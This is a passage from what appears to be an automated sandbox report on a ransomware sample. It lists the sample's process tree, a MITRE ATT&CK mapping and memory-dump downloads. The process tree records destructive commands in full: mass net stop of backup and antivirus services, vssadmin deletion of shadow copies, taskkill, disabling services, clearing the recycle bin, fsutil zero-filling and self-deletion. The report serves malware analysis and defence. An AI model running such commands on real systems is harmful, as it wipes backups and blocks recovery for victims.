    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5988
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:5088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6260
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:6588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:6044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:6664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:6112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:6408
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5852
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5880
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5688
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5588
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4884
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5668
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1824
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4940
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5624
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5344
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5524
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5556
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5440
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5264
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5304
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5356
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4696
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5296
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1328
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:4424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:7152
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:2896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:7144
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:7160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:7068
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:6120
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:4728
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:6244
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:6056
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:7120
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
  2⤵
  PID:5744
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4224

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:4180

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/652-122-0x000000001B1A0000-0x000000001B1A2000-memory.dmp

Filesize
8KB

Download
memory/652-114-0x0000000000750000-0x0000000000751000-memory.dmp

Filesize
4KB

Download
memory/1420-209-0x000001B434270000-0x000001B434272000-memory.dmp

Filesize
8KB

Download
memory/1420-210-0x000001B434273000-0x000001B434275000-memory.dmp

Filesize
8KB

Download
memory/1420-279-0x000001B434276000-0x000001B434278000-memory.dmp

Filesize
8KB

Download
memory/1420-295-0x000001B434278000-0x000001B434279000-memory.dmp

Filesize
4KB

Download
memory/2160-280-0x00000263C3DE6000-0x00000263C3DE8000-memory.dmp

Filesize
8KB

Download
memory/2160-205-0x00000263C3DE3000-0x00000263C3DE5000-memory.dmp

Filesize
8KB

Download
memory/2160-296-0x00000263C3DE8000-0x00000263C3DE9000-memory.dmp

Filesize
4KB

Download
memory/2160-204-0x00000263C3DE0000-0x00000263C3DE2000-memory.dmp

Filesize
8KB

Download
memory/2488-192-0x00000262BFC00000-0x00000262BFC02000-memory.dmp

Filesize
8KB

Download
memory/2488-290-0x00000262BFC08000-0x00000262BFC09000-memory.dmp

Filesize
4KB

Download
memory/2488-194-0x00000262BFC03000-0x00000262BFC05000-memory.dmp

Filesize
8KB

Download
memory/2488-277-0x00000262BFC06000-0x00000262BFC08000-memory.dmp

Filesize
8KB

Download
memory/2608-211-0x000001336ECC0000-0x000001336ECC2000-memory.dmp

Filesize
8KB

Download
memory/2608-276-0x000001336ECC6000-0x000001336ECC8000-memory.dmp

Filesize
8KB

Download
memory/2608-289-0x000001336ECC8000-0x000001336ECC9000-memory.dmp

Filesize
4KB

Download
memory/2608-213-0x000001336ECC3000-0x000001336ECC5000-memory.dmp

Filesize
8KB

Download
memory/2616-287-0x00000234D4038000-0x00000234D4039000-memory.dmp

Filesize
4KB

Download
memory/2616-189-0x00000234D4030000-0x00000234D4032000-memory.dmp

Filesize
8KB

Download
memory/2616-197-0x00000234D4033000-0x00000234D4035000-memory.dmp

Filesize
8KB

Download
memory/2616-275-0x00000234D4036000-0x00000234D4038000-memory.dmp

Filesize
8KB

Download
memory/3084-186-0x000001876D320000-0x000001876D322000-memory.dmp

Filesize
8KB

Download
memory/3084-286-0x000001876D328000-0x000001876D329000-memory.dmp

Filesize
4KB

Download
memory/3084-274-0x000001876D326000-0x000001876D328000-memory.dmp

Filesize
8KB

Download
memory/3084-188-0x000001876D323000-0x000001876D325000-memory.dmp

Filesize
8KB

Download
memory/3812-206-0x0000025E69713000-0x0000025E69715000-memory.dmp

Filesize
8KB

Download
memory/3812-284-0x0000025E69718000-0x0000025E69719000-memory.dmp

Filesize
4KB

Download
memory/3812-259-0x0000025E69716000-0x0000025E69718000-memory.dmp

Filesize
8KB

Download
memory/3812-201-0x0000025E69710000-0x0000025E69712000-memory.dmp

Filesize
8KB

Download
memory/3888-273-0x0000026DB6266000-0x0000026DB6268000-memory.dmp

Filesize
8KB

Download
memory/3888-285-0x0000026DB6268000-0x0000026DB6269000-memory.dmp

Filesize
4KB

Download
memory/3888-199-0x0000026DB6260000-0x0000026DB6262000-memory.dmp

Filesize
8KB

Download
memory/3888-208-0x0000026DB6263000-0x0000026DB6265000-memory.dmp

Filesize
8KB

Download
memory/3988-200-0x0000017CA3D90000-0x0000017CA3D92000-memory.dmp

Filesize
8KB

Download
memory/3988-288-0x0000017CA3D98000-0x0000017CA3D99000-memory.dmp

Filesize
4KB

Download
memory/3988-278-0x0000017CA3D96000-0x0000017CA3D98000-memory.dmp

Filesize
8KB

Download
memory/3988-203-0x0000017CA3D93000-0x0000017CA3D95000-memory.dmp

Filesize
8KB

Download
memory/4000-133-0x0000013FA6A56000-0x0000013FA6A58000-memory.dmp

Filesize
8KB

Download
memory/4000-130-0x0000013FA8CB0000-0x0000013FA8CB1000-memory.dmp

Filesize
4KB

Download
memory/4000-123-0x0000013FA6A50000-0x0000013FA6A52000-memory.dmp

Filesize
8KB

Download
memory/4000-124-0x0000013FA6A53000-0x0000013FA6A55000-memory.dmp

Filesize
8KB

Download
memory/4000-125-0x0000013FA69D0000-0x0000013FA69D1000-memory.dmp

Filesize
4KB

Download
memory/4136-297-0x000001D9A99D8000-0x000001D9A99D9000-memory.dmp

Filesize
4KB

Download
memory/4136-281-0x000001D9A99D6000-0x000001D9A99D8000-memory.dmp

Filesize
8KB

Download
memory/4136-229-0x000001D9A99D0000-0x000001D9A99D2000-memory.dmp

Filesize
8KB

Download
memory/4136-232-0x000001D9A99D3000-0x000001D9A99D5000-memory.dmp

Filesize
8KB

Download
memory/4292-239-0x00000240DD543000-0x00000240DD545000-memory.dmp

Filesize
8KB

Download
memory/4292-283-0x00000240DD546000-0x00000240DD548000-memory.dmp

Filesize
8KB

Download
memory/4292-235-0x00000240DD540000-0x00000240DD542000-memory.dmp

Filesize
8KB

Download
memory/4292-299-0x00000240DD548000-0x00000240DD549000-memory.dmp

Filesize
4KB

Download
memory/4404-298-0x000002C6EE528000-0x000002C6EE529000-memory.dmp

Filesize
4KB

Download
memory/4404-240-0x000002C6EE520000-0x000002C6EE522000-memory.dmp

Filesize
8KB

Download
memory/4404-282-0x000002C6EE526000-0x000002C6EE528000-memory.dmp

Filesize
8KB

Download
memory/4404-242-0x000002C6EE523000-0x000002C6EE525000-memory.dmp

Filesize
8KB

Download